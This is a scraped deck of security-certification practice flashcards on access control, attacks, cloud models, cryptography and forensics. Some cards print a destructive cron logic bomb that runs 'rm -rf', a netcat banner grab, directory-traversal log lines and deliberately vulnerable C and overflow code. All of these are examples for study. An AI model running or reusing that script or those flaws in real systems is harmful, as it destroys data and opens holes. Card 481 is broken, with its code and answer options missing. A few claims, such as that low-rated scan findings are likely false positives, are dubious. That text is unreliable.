A

RAID

Correct Answer:
Redundant Array of Independent Disks (RAID) is used to provide for fault tolerance and recovery against disk failures.
Incorrect Answers:
Striping is used to improve performance but offers no fault tolerance unless used with parity bits.
Clustering is used to provide server fault tolerance.
Network load balancing is used to enhance network performance through balancing network traffic among servers.

450
Q

Administrators who grant access to resources by placing users in groups are using which type of access control model?

Mandatory access control
Role-based access control
Rule-based access control
Discretionary access control

A

Role-based access control

Correct Answer:
Role-based access control grants access to groups performing specific functions, or roles, but not to individuals.
Incorrect Answers:
Discretionary access control allows data owners/creators to grant access to individuals or groups.
Mandatory access control permits only administrators to grant access, based upon security labels.
Rule-based access control grants access to resources based upon specific rules associated with the resource.

451
Q

Which of the following attacks seeks to introduce erroneous or malicious entries into a server’s hostname-to-IP address cache or zone file?

DNS poisoning
Session hijacking
DHCP poisoning
ARP poisoning

A

DNS poisoning

Correct Answer:
DNS poisoning involves introducing false entries into a DNS server’s zone file, or a server’s hostname-to-IP address cache, both with the intent of misdirecting a DNS resolution request to a different server or site.
Incorrect Answer:
ARP poisoning involves introducing false entries into a host’s ARP cache, which maps MAC addresses to IP addresses.
DHCP poisoning is a false term, although there are several known DHCP network attacks.
Session hijacking involves intercepting and taking over an in-progress communications session between two hosts.

452
Q

All of the following are considered elements of a password policy EXCEPT:

Password history
Password complexity
Password aging
Password sharing

A

Password sharing

Correct Answer:
Password sharing typically will be in the acceptable use policy (AUP), as a directive to users about what they can and cannot do.
Incorrect Answers:
Password history, aging, and complexity will all typically be found in a password policy, as technical elements that describe how passwords should be constructed, implemented, and managed by administrators.

453
Q

You are troubleshooting a communication issue on the network. Which of the following protocols is responsible for converting the IP address to a MAC address?

DHCP
DNS
ARP
RARP

A

ARP

Correct Answer:
Address Resolution Protocol (ARP) resolves IP addresses to MAC addresses.
Incorrect Answers:
RARP, the Reverse Address Resolution Protocol, resolves MAC addresses to IP addresses, the exact opposite of ARP.
DNS, the Domain Name System, resolves fully qualified domain names (FQDN) to IP addresses.
DHCP, the Dynamic Host Configuration Protocol, dynamically issues IP addressing information to hosts.

454
Q

Ashlyn, the senior security officer within your organization, has requested that you create a plan for an active security test that tries to bypass the security controls of an asset. What type of test would you plan?

Code review
Vulnerability scan
Penetration test
Risk assessment

A

Penetration test

Correct Answer:
A penetration test is considered an active test because you are actually interacting with the target system and trying to bypass the security controls.
Incorrect Answers:
A vulnerability scan is considered a passive test because it only involves reviewing the configuration of a system to determine if there are any vulnerabilities.
A risk assessment helps identify risks for each asset.
A code review involves reviewing the code of an application to look for flaws.

455
Q

You are conducting a code review of a program and observe that the calculation 0xffffffff + 1 was attempted, but the result returned was 0x00000000. Based on this, what type of exploit could be created against this program?

SQL injection
Impersonation
Integer overflow attack
Password spraying

A

Integer overflow attack
OBJ-1.3: Integer overflows and other integer manipulation vulnerabilities frequently result in buffer overflows. An integer overflow occurs when an arithmetic operation produces a number too large to be stored in the space allocated for it, so the value wraps around. Integers are 32 bits wide on the x86 architecture; therefore, if an integer operation results in a number greater than 0xffffffff, an integer overflow occurs, as was the case in this example. The danger is that a wrapped value is then used as a length or allocation size: a bounds check passes, or a tiny buffer is allocated, and a subsequent copy overruns memory. SQL injection is an attack that injects a database query into the input data directed at a server by accessing the application’s client side. Password spraying is a type of brute-force attack in which multiple user accounts are tested with a dictionary of common passwords. Impersonation is the act of pretending to be another person or system for fraud.
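An added example, not from the original deck, that simulates 32-bit unsigned arithmetic (Python integers do not wrap, so the mask is applied explicitly) and shows how the wrap in the card turns into a bypassed bounds check and an undersized allocation, alongside checked versions. Buffer sizes and element counts are constructed for the demonstration.

```python
from typing import Tuple

MASK32 = 0xFFFFFFFF  # uint32_t range on x86


def add_u32(a: int, b: int) -> int:
    """Unsigned 32-bit addition as C performs it: wraps modulo 2**32."""
    return (a + b) & MASK32


def mul_u32(a: int, b: int) -> int:
    """Unsigned 32-bit multiplication, also wrapping modulo 2**32."""
    return (a * b) & MASK32


def checked_add_u32(a: int, b: int) -> Tuple[int, bool]:
    """Return (wrapped result, overflowed). Plays the role of a checked-add
    helper such as C's __builtin_add_overflow."""
    total = a + b
    return total & MASK32, total > MASK32


def checked_mul_u32(a: int, b: int) -> Tuple[int, bool]:
    product = a * b
    return product & MASK32, product > MASK32


def naive_length_check(length: int, bufsize: int) -> bool:
    """Vulnerable pattern: `if (length + 1 > bufsize) reject;` in 32-bit
    arithmetic. Returns True when the copy would be allowed. With
    length = 0xffffffff the sum wraps to 0 and the check passes."""
    return add_u32(length, 1) <= bufsize


def safe_length_check(length: int, bufsize: int) -> bool:
    """Rearranged so no addition can overflow: compare length against
    bufsize - 1 instead of computing length + 1."""
    return bufsize > 0 and length <= bufsize - 1


def naive_alloc_size(count: int, elem_size: int) -> int:
    """Vulnerable pattern: malloc(count * elem_size) with wrapping multiply.
    A large count yields a tiny allocation that later writes overrun."""
    return mul_u32(count, elem_size)


def safe_alloc_size(count: int, elem_size: int) -> int:
    """Reject the request when the multiplication would overflow (-1 plays
    the role of an error return)."""
    size, overflowed = checked_mul_u32(count, elem_size)
    return -1 if overflowed else size


if __name__ == "__main__":
    print(hex(add_u32(0xFFFFFFFF, 1)))            # 0x0, the card's observation
    print(naive_length_check(0xFFFFFFFF, 64))    # True: bounds check bypassed
    print(naive_alloc_size(0x40000001, 4))        # 4 bytes for 2**30+1 elements
```

The fix is not only a wider type: reorder comparisons so the overflow cannot happen, or use checked arithmetic and fail closed when it reports overflow.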

456
Q

A cybersecurity analyst just finished conducting an initial vulnerability scan and is reviewing their results. To avoid wasting their time on results that are not really a vulnerability, the analyst wants to remove any false positives before remediating the findings. Which of the following is an indicator that something in their results would be a false positive?

A finding that shows the scanner compliance plug-ins are not up-to-date

Items classified by the system as Low or as For Informational Purposes Only

A scan result showing a version that is different from the automated asset inventory

An HTTPS entry that indicates the web page is securely encrypted

A

Items classified by the system as Low or as For Informational Purposes Only

OBJ-1.7: When conducting a vulnerability scan, it is common for the report to include some findings that are classified as “low” priority or “for informational purposes only.” These are most likely false positives and can be ignored by the analyst when starting their remediation efforts. “An HTTPS entry that indicates the web page is securely encrypted” is not a false positive but a true negative (a non-issue). A scan result showing a different version from the automated asset inventory should be investigated and is likely a true positive. A finding that shows the scanner compliance plug-ins are not up-to-date would likely also be a true positive that should be investigated.

457
Q

Several users have contacted the help desk to report that they received an email from a well-known bank stating that their accounts have been compromised and they need to “click here” to reset their banking password. Some of these users are not even customers of this particular bank, though. Which of the following best describes this type of attack?

Phishing
Spear phishing
Whaling
Brute force

A

Phishing
OBJ-1.1: This is an example of a phishing attack. Phishing is the fraudulent practice of sending emails and pretending to be from a reputable company to trick users into revealing personal information, such as passwords and credit card numbers. This email appears to be untargeted since it was sent to both customers and non-customers of this particular bank; it is best classified as phishing. Spear phishing requires the attack to be more targeted and less widespread.

458
Q

You are investigating a suspected compromise. You have noticed several files that you don’t recognize. How can you quickly and effectively check if the files have been infected with malware?

Submit the files to an open-source intelligence provider like VirusTotal

Disassemble the files and conduct static analysis on them using IDA Pro

Run the Strings tool against each file to identify common malware identifiers

Scan the files using a local anti-virus/anti-malware engine

A

Submit the files to an open-source intelligence provider like VirusTotal

OBJ-1.5: The best option is to submit them to an open-source intelligence provider like VirusTotal. VirusTotal allows you to quickly analyze suspicious files and URLs to detect types of malware. It then automatically shares them with the security community as well, so for files that may contain sensitive data, search by the file's hash first and upload only if the hash is unknown. Disassembly and static analysis would require a higher level of knowledge and more time to complete. Running the Strings tool can help identify text if the code is not encoded or packed within the malware, but you have to know what you are looking for, such as a malware signature. You should never rely on scanning the files with a local anti-virus or anti-malware engine if you suspect the workstation or server has already been compromised, because the scanner itself may be compromised.

459
Q

A cybersecurity analyst has determined that an attack has occurred against your company’s network. Fortunately, your company uses a good logging system with a centralized Syslog server, so all the logs are available, collected, and stored properly. According to the cybersecurity analyst, the logs indicate that the database server was the only company server on the network that appears to have been attacked. The network is a critical production network for your organization. Therefore, you have been asked to choose the LEAST disruptive actions on the network while performing the appropriate incident response actions. Which actions do you recommend as part of the response efforts?

Capture network traffic using a sniffer, schedule a period of downtime to image and remediate the affected server, and maintain the chain of custody

Isolate the affected server from the network immediately, format the database server, reinstall from a known good backup

Immediately remove the database server from the network, create an image of its hard disk, and maintain the chain of custody

Conduct a system restore of the database server, image the hard drive, and maintain the chain of custody

A

Capture network traffic using a sniffer, schedule a period of downtime to image and remediate the affected server, and maintain the chain of custody

OBJ-1.7: Since the database server is part of a critical production network, it is important to work with the business to time the remediation period to minimize productivity losses. You can immediately begin to capture network traffic since this won’t affect the database server or the network (least intrusive) while scheduling a period of downtime in which to take a forensic image of the database server’s hard drive. All network captures and the hard drive should be maintained under the chain of custody if needed for criminal prosecution or civil action after remediation. The server should be remediated and brought back online once the hard drive image has been created.

460
Q

[Figure: Attacker sends a Ping Request with SRC IP 10.1.1.2 and DEST IP 192.168.1.155 => 192.168.1.155 Subnet => Server 10.1.1.2]

Based on the image provided, what type of attack is occurring?

SYN flood
Smurf attack
Ping flood
DDoS

A

Smurf attack

OBJ-1.4: A smurf attack occurs when an attacker sends a ping to a subnet broadcast address and devices reply to spoofed IP (victim server), using up bandwidth and processing power. This image is a graphical depiction of this type of attack.

461
Q

Raj is working to deploy a new vulnerability scanner for an organization. He wants to verify the information he gets is the most accurate view of the configurations on the organization’s traveling salespeople’s laptops to determine if any configuration issues could lead to new vulnerabilities. Which of the following technologies would work BEST to collect the configuration information in this situation?

Agent-based scanning
Server-based scanning
Passive network monitoring
Non-credentialed scanning

A

Agent-based scanning
OBJ-1.7: Using agent-based scanning, you typically get the most reliable results for systems that are not connected to the network, as well as the ones that are connected. This is ideal for traveling salespeople since their laptops are not constantly connected to the organization’s network. These agent-based scans can be conducted when the laptop is offline and then sent to a centralized server the next time it is connected to the network. Server-based scanning, non-credentialed scanning, and passive network monitoring all require a continuous network connection to collect the configurations of the devices accurately.

462
Q

You are working as a security analyst and are reviewing the logs from a Linux server. Based on the portion of the logs displayed here, what type of malware might have been installed on the server?
Linux:~ diontraining$ crontab -l
5 * * * * /usr/local/backupscript.sh

Linux:~ diontraining$ cat /usr/local/bin/backupscript.sh
#!/bin/bash

if ! grep --silent jdion.usr /etc/passwd
then rm -rf
fi

Based on the output provided, what type of malware may have been installed on this user’s computer?

Trojan
Virus
Logic bomb
Ransomware

A

Logic bomb
OBJ-1.2: This short log shows a logic bomb on the Linux server. The first two lines show a crontab job is scheduled to run the backup script every 5 minutes. The cat command used in this example (line three) reads data from the file and displays it to the screen. In this case, we can see what actions the backupscript.sh file will take when it is run every five minutes as scheduled in the first two lines of this output. The script is shown as a bash shell script, and it will first determine if the string “jdion.usr” is found in the /etc/passwd file. Based on the context, you can assume jdion.usr is a possible user account on the system. If jdion.usr is NOT found in the passwd file, it will run the command “rm -rf” to recursively remove (rm) all the files and folders.

463
Q

Nick is participating in a security exercise as part of the network defense team for his organization. Which team is Nick playing on?

Red team
White team
Blue team
Yellow team

A

Blue team
OBJ-1.8: Penetration testing can form the basis of functional exercises. One of the best-established means of testing a security system for weaknesses is to play “war game” exercises in which the security personnel split into teams: red, blue, and white. The red team acts as the adversary. The blue team acts as the defenders. The white team acts as the referees and sets the parameters for the exercise. The yellow team is responsible for building tools and architectures in which the exercise will be performed.

464
Q

[root@kali] nc test.diontraining.com 80
HEAD / HTTP/1.1
HTTP/1.1 200 OK
Date: Sun, 12 Jun 2020 14:12:45 AST
Server: Apache/2.0.46 (Unix) (Red Hat/Linux)
Last-modified: Thu, 16 Apr 2009 11:20:14 PST
ETag: “1986-69b-123a4bc6”
Accept-Ranges: bytes
Content-Length: 6485
Connection: close
Content-Type: text/html
What type of action did the analyst perform, based on the command and response above?

Cross-site scripting
Banner grabbing
SQL injection
Querying the Whois database

A

Banner grabbing
OBJ-1.8: The analyst conducted banner grabbing. Banner grabbing is a technique used to learn information about a computer system on a network and the services running on its open ports. In the question, the command “nc test.diontraining.com 80” was used to establish a connection to a target web server using netcat, then send an HTTP request (HEAD / HTTP/1.1). The response contains information about the service running on the webserver. In this example, it reveals the server software version (Apache 2.0.46) and the operating system (Red Hat Linux). Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser side script, to a different end-user. SQL injection is a code injection technique used to attack data-driven applications where malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. A query to the WHOIS database would return information on the website owner, not the server’s operating system.

465
Q

Which attack method is MOST likely to be used by a malicious employee or insider trying to obtain another user’s passwords?

Man-in-the-middle
Phishing
Tailgating
Shoulder surfing

A

Shoulder surfing
OBJ-1.1: While a malicious employee or insider could use all of the methods listed to obtain another user’s passwords, shoulder surfing is the MOST likely to be used. Shoulder surfing is a type of social engineering technique used to obtain personal identification numbers (PINs), passwords, and other confidential data by looking over the victim’s shoulder. Since a malicious employee or insider can work close to their victims (other users), they could easily use this technique to collect the victimized users’ passwords.

466
Q

Praveen is currently investigating activity from an attacker who compromised a host on the network. The individual appears to have used credentials belonging to a janitor. After breaching the system, the attacker entered some unrecognized commands with very long text strings and then began using the sudo command to carry out actions. What type of attack has just taken place?

Privilege escalation
Phishing
Social engineering
Session hijacking

A

Privilege escalation
OBJ-1.3: The use of long query strings points to a buffer overflow attack, and the sudo command confirms the elevated privileges after the attack. This indicates a privilege escalation has occurred. While the other three options may have been used as an initial access vector, they cannot be confirmed based on the question’s details. Only a privilege escalation is currently verified within the scenario due to the use of sudo.

467
Q

Windows file servers commonly hold sensitive files, databases, passwords, and more. What common vulnerability is usually used against a Windows file server to expose sensitive files, databases, and passwords?

Cross-site scripting
SQL injection
Missing patches
CRLF injection

A

Missing patches
OBJ-1.6: Missing patches are the most common vulnerability found on both Windows and Linux systems. When a security patch is released, attackers begin to reverse engineer the security patch to exploit the vulnerability. If your servers are not patched against the vulnerability, they can become victims of the exploit, and the server’s data can become compromised. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. Cross-site scripting focuses on exploiting a user’s workstation, not a server. CRLF injection is a software application coding vulnerability that occurs when an attacker injects a CRLF character sequence where it is not expected. SQL injection is the placement of malicious code in SQL statements via web page input. SQL injection is commonly used against databases, but it is not useful when attacking file servers.

468
Q

10.1.1.1 - - [10/Jan/2020:13:23:51 +0000] “POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1” 200 143 “https://10.1.1.2/” “USERAGENT “
10.1.1.1 - - [10/Jan/2020:13:23:53 +0000] “GET /vpn/../vpns/portal/backdoor.xml HTTP/1.1” 200 941 “-“ “USERAGENT”
10.1.1.1 - - [10/Jan/2020:16:12:31 +0000] “POST /vpns/portal/scripts/newbm.pl HTTP/1.1” 200 143 “https://10.1.1.2/” “USERAGENT”
What type of attack was most likely being attempted by the attacker?

SQL injection
Directory traversal
XML injection
Password spraying

A

Directory traversal
OBJ-1.3: A directory traversal attack aims to access files and directories stored outside the webroot folder. By manipulating variables or URLs that reference files with “dot-dot-slash (../)” sequences and its variations or using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. The example output provided comes from a remote code execution vulnerability being exploited in which a directory traversal is used to access the files. XML Injection is an attack technique used to manipulate or compromise an XML application or service’s logic. SQL injection is the placement of malicious code in SQL statements via web page input. Password spraying attempts to crack various users’ passwords by attempting a compromised password against multiple user accounts.

469
Q

A user has reported that their workstation is running very slowly. A technician begins to investigate the issue and notices a lot of unknown processes running in the background. The technician determines that the user has recently downloaded a new application from the internet and may have become infected with malware. Which of the following types of infections does the workstation MOST likely have?

Rootkit
Keylogger
Trojan
Ransomware

A

Trojan
OBJ-1.2: A trojan is a type of malware that looks legitimate but can take control of your computer. A Trojan is designed to damage, disrupt, steal, or in general, inflict some other harmful action on your data or network. The most common form of a trojan is a Remote Access Trojan (RAT), which allows an attacker to control a workstation or steal information remotely. To operate, a trojan will create numerous processes that run in the background of the system.

470
Q

During your annual cybersecurity awareness training in your company, the instructor states that employees should be careful about what information they post on social media. According to the instructor, if you post too much personal information on social media, such as your name, birthday, hometown, and other personal details, it is much easier for an attacker to conduct which type of attack to break your passwords?

Birthday attack
Brute force attack
Cognitive password attack
Rainbow table attack

A

Cognitive password attack
OBJ-1.2: A cognitive password is a form of knowledge-based authentication that requires a user to answer a question, presumably something they intrinsically know, to verify their identity. If you post a lot of personal information about yourself online, this type of password can easily be bypassed. For example, in 2008, Vice Presidential candidate Sarah Palin’s email account was hacked because a high schooler used the “reset my password” feature on Yahoo’s email service to reset her password using the information that was publicly available about Sarah Palin (like her birthday, high school, and other such information).

471
Q

A popular game allows for in-app purchases to acquire extra lives in the game. When a player purchases the extra lives, the number of lives is written to a configuration file on the gamer’s phone. A hacker loves the game but hates having to buy lives all the time, so they developed an exploit that allows a player to purchase 1 life for $0.99 and then modifies the content of the configuration file to claim 100 lives were purchased before the application reads the number of lives purchased from the file. Which of the following types of vulnerabilities did the hacker exploit?

Sensitive data exposure
Dereferencing
Broken authentication
Race condition

A

Race condition
OBJ-1.6: Race conditions occur when the outcome from execution processes is directly dependent on the order and timing of certain events. Those events fail to execute in the order and timing intended by the developer. In this scenario, the hacker’s exploit is racing to modify the configuration file before the application reads the number of lives from it. Sensitive data exposure is a fault that allows privileged information (such as a token, password, or PII) to be read without being subject to the proper access controls. Broken authentication refers to an app that fails to deny access to malicious actors. Dereferencing attempts to access a pointer that references an object at a particular memory location.

472
Q

You just received a notification that your company’s email servers have been blacklisted due to reports of spam originating from your domain. What information do you need to start investigating the source of the spam emails?

Firewall logs showing the SMTP connections
The SMTP audit log from your company’s email server
The full email header from one of the spam messages
Network flows for the DMZ containing the email servers

A

The full email header from one of the spam messages

OBJ-1.1: You should first request a copy of one of the spam messages, including the full email header. By reading through the full headers of one of the messages, you can determine where the email originated from, whether it was from your email system or external, and if it was a spoofed email or a legitimate email. Once this information has been analyzed, you can then continue your analysis based on those findings, whether that be analyzing your email server, the firewalls, or other areas of concern. If enough information cannot be found by analyzing the email headers, you will need to conduct more research to determine the best method to solve the underlying problem.

473
Q
preparations, you have been given the source code for the organization’s custom web application.
Linux:~ diontraining$ cat DionCode.c
#include <string.h>

void DionCode(char *varX)
{
    char user_input[20];        /* fixed-size buffer: only 20 bytes allocated */
    strcpy(user_input, varX);   /* no length check: input of 20+ characters overflows the buffer */
}

Which type of vulnerability might be able to exploit the code shown in this image?

Buffer overflow
SQL injection
Remote code execution
JavaScript injection

A

Buffer overflow
OBJ-1.2: The function DionCode may be subject to a buffer overflow if the user enters something over 20 characters as their input. In defining the char (character) type array, the programmer only allocated 20 characters worth of memory storage. To solve this problem, the programmer should create proper input validation to ensure that the input is less than 20 characters before passing the user_input variable to the strcpy (string copy) function.

474
Q

What control provides the best protection against both SQL injection and cross-site scripting attacks?

Hypervisors
Network layer firewalls
CSRF
Input validation

A

Input validation
OBJ-1.3: Input validation prevents the attacker from sending invalid data to an application and is a strong control against both SQL injection and cross-site scripting attacks. A network layer firewall is a device that is designed to prevent unauthorized access, thereby protecting the computer network. It blocks unauthorized communications into the network and only permits authorized access based on the IP address, ports, and protocols in use. Cross-site request forgery (CSRF) is another attack type. A hypervisor controls access between virtual machines.

475
Q

The Pass Certs Fast corporation has recently been embarrassed by several high profile data breaches. The CIO proposes improving the company’s cybersecurity posture by migrating images of all the current servers and infrastructure into a cloud-based environment. What, if any, is the flaw in moving forward with this approach?

This approach assumes that the cloud will provide better security than is currently done on-site

This approach only changes the location of the network and not the attack surface of it

The company has already paid for the physical servers and will not fully realize their ROI on them due to the migration

This is a reasonable approach that will increase the security of the servers and infrastructure

A

This approach only changes the location of the network and not the attack surface of it

OBJ-1.5: A poorly implemented security model at a physical location will still be a poorly implemented security model in a virtual location. Unless the fundamental causes of the security issues that caused the previous data breaches have been understood, mitigated, and remediated, then migrating the current images into the cloud will change where the processing occurs without improving the security of the network. While the statement concerning unrealized ROI may be accurate, it simply demonstrates the sunk cost argument’s fallacy. These servers were already purchased, and the money was spent. Regardless of whether we maintain the physical servers or migrate to the cloud, that money is gone. Those servers could also be repurposed, reused, or possibly resold to recoup some of the capital invested. While the company’s physical security will potentially improve in some regards, the physical security of the endpoints on-premises is still a concern that cannot be solved by this cloud migration. Additionally, the scenario never stated that physical security was an issue that required being addressed, so it is more likely that the data breach occurred due to a data exfiltration over the network. As a cybersecurity analyst, you must consider the business case and the technical accuracy of a proposed approach or plan to add the most value to your organization.

476
Q

Which of the following cryptographic algorithms is classified as symmetric?

AES
RSA
Diffie-Hellman
ECC

A

AES
OBJ-2.8: The Advanced Encryption Standard (AES) is a symmetric block cipher with a fixed block size of 128 bits. It can utilize a 128-bit, 192-bit, or 256-bit symmetric key. RSA, Diffie-Hellman, and ECC are all asymmetric algorithms.

477
Q

Your company has decided to move all of its data into the cloud. Your company is concerned about the privacy of its data due to some recent data breaches that have been in the news. Therefore, they have decided to purchase cloud storage resources that will be dedicated solely for their use. Which of the following types of clouds is your company using?

Hybrid
Private
Public
Community

A

Private
OBJ-2.2: Private cloud refers to a cloud computing model where IT services are provisioned over private IT infrastructure for the dedicated use of a single organization. A private cloud is usually managed via internal resources. The terms private cloud and virtual private cloud (VPC) are often used interchangeably.

478
Q

Which of the following techniques would be the most appropriate solution to implementing a multi-factor authentication system?

Fingerprint and retinal scan
Password and security question
Smartcard and PIN
Username and password

A

Smartcard and PIN
OBJ-2.4: Multi-factor authentication (MFA) creates multiple security layers to help increase the confidence that the user requesting access is who they claim to be by requiring two distinct factors for authentication. These factors can be something you know (knowledge factor), something you have (possession factor), something you are (inheritance factor), something you do (action factor), or somewhere you are (location factor). By selecting a smartcard (something you have) and a PIN (something you know), you have implemented multi-factor authentication. Choosing a fingerprint and retinal scan would instead use only one factor (inheritance). Choosing a username, password, and security question would also be only using one factor (knowledge). For something to be considered multi-factor, you need items from at least two different authentication factor categories: knowledge, possession, inheritance, location, or action.

479
Q

When conducting forensic analysis of a hard drive, what tool would BEST prevent changing the hard drive contents during your analysis?

Forensic drive duplicator
Hardware write blocker
Software write blocker
Degausser

A

Hardware write blocker
OBJ-2.7: Both hardware and software write blockers are designed to ensure that forensic software and tools cannot change a drive inadvertently by accessing it. But, since the question indicates that you need to choose the BEST solution to protect the drive’s contents from being changed during analysis, you should pick the hardware write blocker. A hardware write blocker’s primary purpose is to intercept and prevent (or ‘block’) any modifying command operation from ever reaching the storage device. A forensic drive duplicator copies a drive and validates that it matches the original drive but cannot be used by itself during analysis. A degausser is used to wipe magnetic media. Therefore, it should not be used on the drive since it would erase the hard drive contents.

480
Q

You are installing Windows 2016 on a rack-mounted server and hosting multiple virtual machines within the physical server. You just finished the installation and now want to begin creating and provisioning the virtual machines. Which of the following should you utilize to allow you to create and provision the virtual machines?

Disk management
Hypervisor
Device manager
Terminal services

A

Hypervisor
OBJ-2.2: A hypervisor, also known as a virtual machine monitor, is a process that creates and runs virtual machines (VMs). A hypervisor allows one host computer to support multiple guest VMs by virtually sharing its resources, like memory and processing. To create and provision virtual machines within the Windows 2016 operating system, you can use a Type II hypervisor like VMware or VirtualBox.

481
Q

You have been asked to scan your company’s website using the OWASP ZAP tool. When you perform the scan, you received the following warning:
“The AUTOCOMPLETE output is not disabled in HTML FORM/INPUT containing password type input. Passwords may be stored in browsers and retrieved.”
You begin to investigate further by reviewing a portion of the HTML code from the website that is listed below:

A

You tell the developer to review their code and implement a bug/code fix

OBJ-2.3: Since your company owns the website, you can require the developer to implement a bug/code fix to prevent the form from allowing the AUTOCOMPLETE function to work on this website. The code change to perform is quite simple, simply adding “autocomplete=off” to the first line of the code. The resulting code would be .

482
Q
You have signed up for a web-based appointment scheduling application to help you manage your new IT technical support business. What type of solution would this be categorized as?
DaaS
PaaS
IaaS
SaaS
A

SaaS
OBJ-2.2: Software as a Service (SaaS) is used to provide web applications to end-users. This can be a calendar, scheduling, invoicing, word processor, database, or other programs. For example, Google Docs and Office 365 are both word processing SaaS solutions. QuickBooks Online is one example of a SaaS solution for accounting.

483
Q

What is used as a measure of biometric performance to rate the system’s ability to correctly authenticate an authorized user by measuring the rate that an unauthorized user is mistakenly permitted access?

False acceptance rate
False rejection rate
Crossover error rate
Failure to capture

A

False acceptance rate
OBJ-2.4: False acceptance rate (FAR), or Type II, is the measure of the likelihood that the biometric security system will incorrectly accept an access attempt by an unauthorized user. The false rejection rate is calculated based upon the number of times an authorized user is denied access to the system.

484
Q

You were conducting a forensic analysis of an iPad backup and discovered that only some of the information is within the backup file. Which of the following best explains why some of the data is missing?

The backup was interrupted
The backup is encrypted
The backup is a differential backup
The backup is stored in iCloud.

A

The backup is a differential backup
OBJ-2.5: iPhone/iPad backups can be created as full or differential backups. In this scenario, the backup being analyzed is likely a differential backup containing the information that has changed since the last full backup. If the backup were encrypted, you would be unable to read any of the contents. If the backup were interrupted, the backup file would be in an unusable state. If the backup were stored in iCloud, you would need access to their iCloud account to retrieve and access the file. Normally, during an investigation, you will not have access to the user’s iCloud account.

485
Q

Nicole’s organization does not have the budget or staff to conduct 24/7 security monitoring of their network. To supplement her team, she contracts with a managed SOC service. Which of the following services or providers would be best suited for this role?

MSSP
IaaS
PaaS
SaaS

A

MSSP
OBJ-2.2: A managed security service provider (MSSP) provides security as a service (SECaaS). IaaS, PaaS, and SaaS (infrastructure, platform, and software as a service) do not include security monitoring as part of their core service offerings. Security as a service or a managed service provider (MSP) would be better suited for this role.

486
Q

Which of the following would a virtual private cloud infrastructure be classified as?

Infrastructure as a Service
Platform as a Service
Software as a Service
Function as a Service

A

Infrastructure as a Service
OBJ-2.2: Infrastructure as a Service (IaaS) is a computing method that uses the cloud to provide any or all infrastructure needs. In a VPC environment, an organization may provision virtual servers in a cloud-hosted network. The service consumer is still responsible for maintaining the IP address space and routing internally to the cloud. Platform as a Service (PaaS) is a computing method that uses the cloud to provide any platform-type services. Software as a Service (SaaS) is a computing method that uses the cloud to provide users with application services. Function as a Service (FaaS) is a cloud service model that supports serverless software architecture by provisioning runtime containers to execute code in a particular programming language.

487
Q
Which of the following cryptographic algorithms is classified as asymmetric?
AES
RC4
RSA
DES
A

RSA
OBJ-2.8: RSA (Rivest–Shamir–Adleman) was one of the first public-key cryptosystems and is widely used for secure data transmission. As a public-key cryptosystem, it relies on an asymmetric algorithm. AES, RC4, and DES are all symmetric algorithms.

488
Q
Your company has just finished replacing all of its computers with brand new workstations. Colleen, one of your coworkers, has asked the company's owner if she can have the old computers that are about to be thrown away. Colleen would like to refurbish the old computers by reinstalling a new operating system and donate them to a local community center for disadvantaged children in the neighborhood. The owner thinks this is a great idea but is concerned that the private and sensitive corporate data on the old computers’ hard drives might be placed at risk of exposure. You have been asked to choose the best solution to sanitize or destroy the data while ensuring the computers will still be usable by the community center. What type of data destruction or sanitization method do you recommend?
Degaussing
Wiping
Purging
Shredding
A

Wiping
OBJ-2.7: Data wiping or clearing occurs by using a software tool to overwrite the data on a hard drive to destroy all electronic data on a hard disk or other media. Data wiping may be performed with a 1x, 7x, or 35x overwriting, with a higher number of times being more secure. This allows the hard drive to remain functional and allows for hardware reuse. Degaussing a hard drive involves demagnetizing a hard drive to erase its stored data. You cannot reuse a hard drive once it has been degaussed. Therefore, it is a bad solution for this scenario. Purging involves removing sensitive data from a hard drive using the device’s own electronics or an outside source (like a degausser). A purged device is generally not reusable. Shredding involves the physical destruction of the hard drive. This is a secure method of destruction but doesn’t allow for device reuse.

489
Q
Which of the following utilizes a well-written set of carefully developed and tested scripts to orchestrate runbooks and generate consistent server builds across an enterprise?
Software as a Service (SaaS)
Infrastructure as a Service (IaaS)
Infrastructure as Code (IaC)
Software Defined Networking (SDN)
A

Infrastructure as Code (IaC)
OBJ-2.2: IaC is designed with the idea that a well-coded description of the server/network operating environment will produce consistent results across an enterprise and significantly reduce IT overhead costs through automation while precluding the existence of security vulnerabilities. SDN uses software to define networking boundaries but does not necessarily handle server architecture in the same way that IaC can. Infrastructure as a Service (IaaS) is a computing method that uses the cloud to provide any or all infrastructure needs. Software as a Service (SaaS) is a computing method that uses the cloud to provide users with application services.

490
Q
Which of the following hashing algorithms results in a 256-bit fixed output?
MD-5
SHA-1
NTLM
SHA-2
A

SHA-2
OBJ-2.8: SHA-2 creates a 256-bit fixed output. SHA-1 creates a 160-bit fixed output. NTLM creates a 128-bit fixed output. MD-5 creates a 128-bit fixed output.

491
Q

A corporate workstation was recently infected with malware. The malware was able to access the workstation’s credential store and steal all the usernames and passwords from the machine. Then, the malware began to infect other workstations on the network using the usernames and passwords it stole from the first workstation. The IT Director has directed its IT staff to develop a plan to prevent this issue from occurring again. Which of the following would BEST prevent this from reoccurring?

Install a host-based intrusion detection system on all of the corporate workstations

Install an anti-virus or anti-malware solution that uses heuristic analysis

Install a Unified Threat Management system on the network to monitor for suspicious traffic

Monitor all workstations for failed login attempts and forward them to a centralized SYSLOG server

A

Install an anti-virus or anti-malware solution that uses heuristic analysis
OBJ-3.3: The only solution that could STOP this from reoccurring would be to use an anti-virus or anti-malware solution with heuristic analysis. The other options might be able to monitor and detect the issue but not stop it from spreading. Heuristic analysis is a method employed by many computer anti-virus programs designed to detect previously unknown computer viruses and new variants of viruses already in the wild. This is behavior-based detection and prevention, so it should detect the issue and stop it from spreading throughout the network.

492
Q

Dion Training has an open wireless network called “InstructorDemos” for its instructors to use during class, but they do not want any students connecting to this wireless network. The instructors need the “InstructorDemos” network to remain open since some of their IoT devices used during course demonstrations do not support encryption. Based on the requirements provided, which of the following configuration settings should you use to satisfy the instructor’s requirements and prevent students from using the “InstructorDemos” network?

MAC filtering
NAT
QoS
Signal strength

A

MAC filtering
